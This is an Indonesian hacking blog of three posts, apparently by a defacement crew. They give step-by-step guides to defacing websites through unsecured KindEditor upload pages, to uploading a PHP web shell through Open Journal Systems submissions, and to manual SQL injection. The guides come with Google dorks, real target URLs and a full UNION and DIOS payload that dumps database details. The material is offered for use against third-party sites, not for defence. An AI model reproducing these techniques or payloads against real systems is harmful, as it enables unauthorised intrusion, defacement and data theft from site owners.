Pengikut

Lu mau cari apa tulis disini

Sabtu, 06 Juli 2019

Cara deface website mudah menggunakan metode kineditor

Haii kembali lagi dengan saiya :v Mr.TenAr hehehe :v
oke kali ini saya akan memberikan tutorial bagaimana sih cara men deface web dengan muda
wahh ini cocok untuk kalian para awan soalnya MUDAH banget XD :v

di atas adalah tampilan deface saya :v hehehe wajar namanya juga heker galau :v
Kalau dalam kamus umum Deface berarti merusakkan,mencemarkan,menggoresi,menghapus, tapi deface yang kita maksud adalah proses merubah tampilan suatu websitem entah menambah file ke system maupun mengedit keseluruhan systemnya.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
oke oke langsung saja yaa jangan kebanyakan cekcot :P

JIKA INGIN LANGSUNG MEIHAT VIDEO NYA CEK AJA 
Link : https://www.youtube.com/watch?v=lqIRUFLQMs4
1.bahan bahan yang diperlukan

- Dork : inurl:examples/uploadbutton.html (Kembangin lagi)
- Script Deface
- Browser Kesayangan kalean :D
- Koneksi Internet ( kalau gaada tidur aja)
- secangkir Kopi Kapal Api

2. masukan Dork Kalian ke Google yaa :)
Cari sendiri jangan manja di situ banyak kale :D

3. Pilih taget sesuka kalian :)

4.Jika Vuln maka tampilan web akan seperti gambar di bawa ( kalau tidak vuln cari lagi sampe ketemu ;))
5. jika sudah.....klik UPLOAD yang ada di website tersebut.

6.saaatnya  pilih script deface kalian sesuka kalian yang akan di upload ke web tersebut dan klik open.

7.Jika script deface kalian sudah ter upload maka akan muncul tulisan di box samping upload. jika error maka kalian ganti web yang lain karna kemungkinan saja itu tidak vuln (yang sabar ya bos)

8.jika sudah kalian copy yang ada di box itu.

9.pastekan copyan kalian di belakang URL nya contoh : https://target.com/(taru yang kalian copy tadi  yang di box).
example : http://weixin.hengxin.org/tpl/static/kindeditor/attached/file/20190706/20190706164235_32320.html

10. BOMMMMM!!! Ter Deface Kan. mudah sekali!!>....

Oke Sekian Dan Terima Kasih ^_^


Rabu, 03 Juli 2019

Deface dengan OJS

Deface dengan OJS (Open Journals System) + Shell Finder OJS

Type : Uploader File Data
Dork : inurl:/files/journals/ (Kembangin lagi ya mas broo :v)
Vuln : /index.php/index/user/register ( Bisa registrasi ) (kalau gaada registrasinya ya cari lagi)


CEK VIDEO NYAhttps://www.youtube.com/watch?v=YA5823H7p3s

1. Kamu harus mendaftar dulu disini > site,com/index.php/index/user/register
    - Centang "Author....."

   - Jangan Centang  "Send me a confirmation email....."
                     
2. Setelah Registasi Klik "New Submission" / "New Article"
                                
3. Selesaikan Step 1

4. Di Step 2, kamu dapat upload shell (format shell : a.phtml)
 
- Choose File, lalu Upload / Download Server

Shell Path : /files/journals/1/articles/454/submission/original/454-879-1-SM.phtml

Penjelasan : 
Filename : 454-879-1-SM.phtml
454 = id user kamu
note : kalo ga ketemu bisa gunakan : http://pastebin.com/r4k1cPs8 (OJS shell Finder)



 
 

Selasa, 28 Mei 2019

SQL INJECTION

Hallo sobat sobat hekel hekel :) kali ini saya akan memberitaukan apa itu SQL INJECTION Dan Bagaimana cara melakukan SQL INJECTION :v dan ada syaratnya...

1.Tanggung jawab
2.Kopi
3.Rokok filter 1 bungkus :v

hehehe enggak bercanda...oke oke langsung aja kita Lakuin
<?quotes : ilmu tidak bakalan habis jika ilmu itu dibagikan kepada orang yang membutuhkan :) >;

1.SQL INJECTION

     Structured Query Language (SQL) digunakan untuk melakukan query, mengoperasikan, dan mengelola sistem database seperti SQL server, Oracle, atau MySQL. Penggunaan umum SQL konsisten di semua sistem databatase, namun ada detail perbedaan tertentu yang khusus untuk setiap sistem.

SQL Injection adalah teknik yang menyalahgunakan celah keamanan yang ada pada lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring secara benar, contohnya adalah kolom username yang seharusnya hanya diisi dengan huruf atau angka tapi malah diisi dengan karakter lain (seperti: – = ’) sehingga penyerang menggunakan celah tersebut dengan cara memasukan query dari SQL.

Sudah Paham apa itu SQL INJECTION :) jika belum silahkan baca kembali dah hayati dengan hati

jika sudah paham kita lanjut bagaiman cara melakukan SQL INJECTION secara MANUAL

1.Mencari Target Web
   bagaimana cara kita mencari target dengan mudah :)
kita akan menggunakan dork jika tidak tau dork itu apa saya akan membahasnya di lain kesempatan
contoh dork :
-inurl:detail.php?id=
-inurl:produk.php?id=
-inurl:index.php?id=
-inurl:page.php?id=
KEMBANGIN LAGI DORK-NYA BIAR PERAWAN :)
disini saya akan menggunakan dork "inurl.detail.php?id="
tuliskan saja dork di serach google contoh liat gambar di bawah


disiki kita akan gampang mencari web yang rentan terhadap sql injection..
carilah target web!!! :)

target web saya  : http://www.nashgroup.co.in/product-detail.php?id=2

awalnya tampilan web biasa biasa saja seperti tidak ada kerentanan.
bagaimana jika kita menambahkan string atau tanda ' pada paramaeternya..
contoh :

http://www.nashgroup.co.in/product-detail.php?id=2'

maka tampilan web akan seperti ini
vulnerable : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1



 oke disini kita sudah tau bahwa web ini rentan terhadap sql injection
bagaimana cara selanjutnya.. kita akan meng order web itu dengan menambahkan +order+by+1 di akhir parameternya.
contoh :

http://www.belbana.com/our-products-detail.php?id=7+order+by+1

ketika kita meng order web kita akan dikembalikan ke web awal jika kembali ke web awal kita akan mengganti 1 ini ke angka yang lebih tinggi sampai web error.
contoh :

http://www.nashgroup.co.in/product-detail.php?id=2+order+by+1
http://www.nashgroup.co.in/product-detail.php?id=2+order+by+2
http://www.nashgroup.co.in/product-detail.php?id=2+order+by+3
http://www.nashgroup.co.in/product-detail.php?id=2+order+by+8 >> ini columns yang error saya

target saya error di columns 8
Columns yang error akan terlihat seperti ini : Unknown column '8' in 'order clause'




Oke selanjutnya kita akan meng UNION website tersebut caranya dengan menambahkan kalima di akhir URL
CONTOH : (Jangan lupa sebelum parameternya kasih tanda - biar terlihat nomor togle nya) disini saya error di columns 8 maka yang kita akan union di columns sebelumnya yaitu > 7

http://www.nashgroup.co.in/product-detail.php?id=2+UNION+SELECT+1,2,3,4,5,6,7--+

maka akan terlihat nomor togle nya yaitu nomor 3

maka kita akan mengetahui dimana letak columns (togle) yang error >> oke selanjutnya kita akan melihat isi database website itu dengan menggunakan DIOS :)
saya akan mengasih DIOS-nya untuk melihat databasenya :

concat(0x3c63656e7465723e3c666f6e742073697a653d2238223e3c666f6e7420636f6c6f723d22626c61636b223e496e6a6563746572207734726c30636b3c2f666f6e743e3c2f666f6e743e3c2f63656e7465723e,@@datadir,0x3C62723E3C666F6E7420636F6C6F723D626C75653E7C557365727C207E3E203C2F666F6E743E,0x3c617564696f206175746f706c61793e3c736f75726365207372633d22687474703a2f2f6c712e646a2d70756e6a61622e696e666f2f736f6e67732f34382f32363238342f536f756c6a617325323053746f727925323028526161674a6174742e636f6d292e6d7033223e3c2f617564696f3e,user(),0x3C62723E3C666F6E7420636F6C6F723D677265656E3E7C56657273696F6E7C207E3E203C2F666F6E743E,version(),0x3C62723E3C666F6E7420636F6C6F723D707572706C653E7C44427C207E3E3E203C2F666F6E743E,database(),0x3C62723E3C666F6E7420636F6C6F723D233842303030303E7C506F72747C207E3E3E203C2F666F6E743E,@@port,0x3C62723E3C666F6E7420636F6C6F723D233737383839393E7C546D704469727C207E3E3E203C2F666F6E743E,@@tmpdir,0x3C62723E3C666F6E7420636F6C6F723D234443313433433E7C43757272656E745F557365727C207E3E3E203C2F666F6E743E,current_user(),0x3C62723E3C666F6E7420636F6C6F723D234646443730303E7C53797374656D5F557365727C207E3E3E203C2F666F6E743E,system_user(),0x3C62723E3C666F6E7420636F6C6F723D233546394541443E7C53657373696F6E5F557365727C207E3E3E203C2F666F6E743E,session_user(),0x3C62723E3C666F6E7420636F6C6F723D6C696D653E7C536368656D617C207E3E3E203C2F666F6E743E,schema(),0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x7c486f7374204e616d657c207e203e3e,@@HOSTNAME,0x3c62723e,0x3c666f6e7420636f6c6f723d7265643e,0x7c53796d6c696e6b7c207e203e3e,@@HAVE_SYMLINK,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,0x7c426974732044657461696c737c207e203e3e,@@VERSION_COMPILE_MACHINE,0x3c62723e%20,0x3c666f6e7420666163653d636f75726965723e,0x7c46696c652053797374656d7c207e203e3e,@@CHARACTER_SET_FILESYSTEM,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)%20)

HASILNYA :)
BOOM DATABASE NYA TERLIHAT DENGAN JELAS ;)

selanjutnya bagaimana cara kita memasuki admin website itu!! kita akan pelajari di minggu depan terimakasih :)

THANKS TO ADMIN AKATSUKI CYBER TEAM
                                           AKATSUKI CYBER TEAM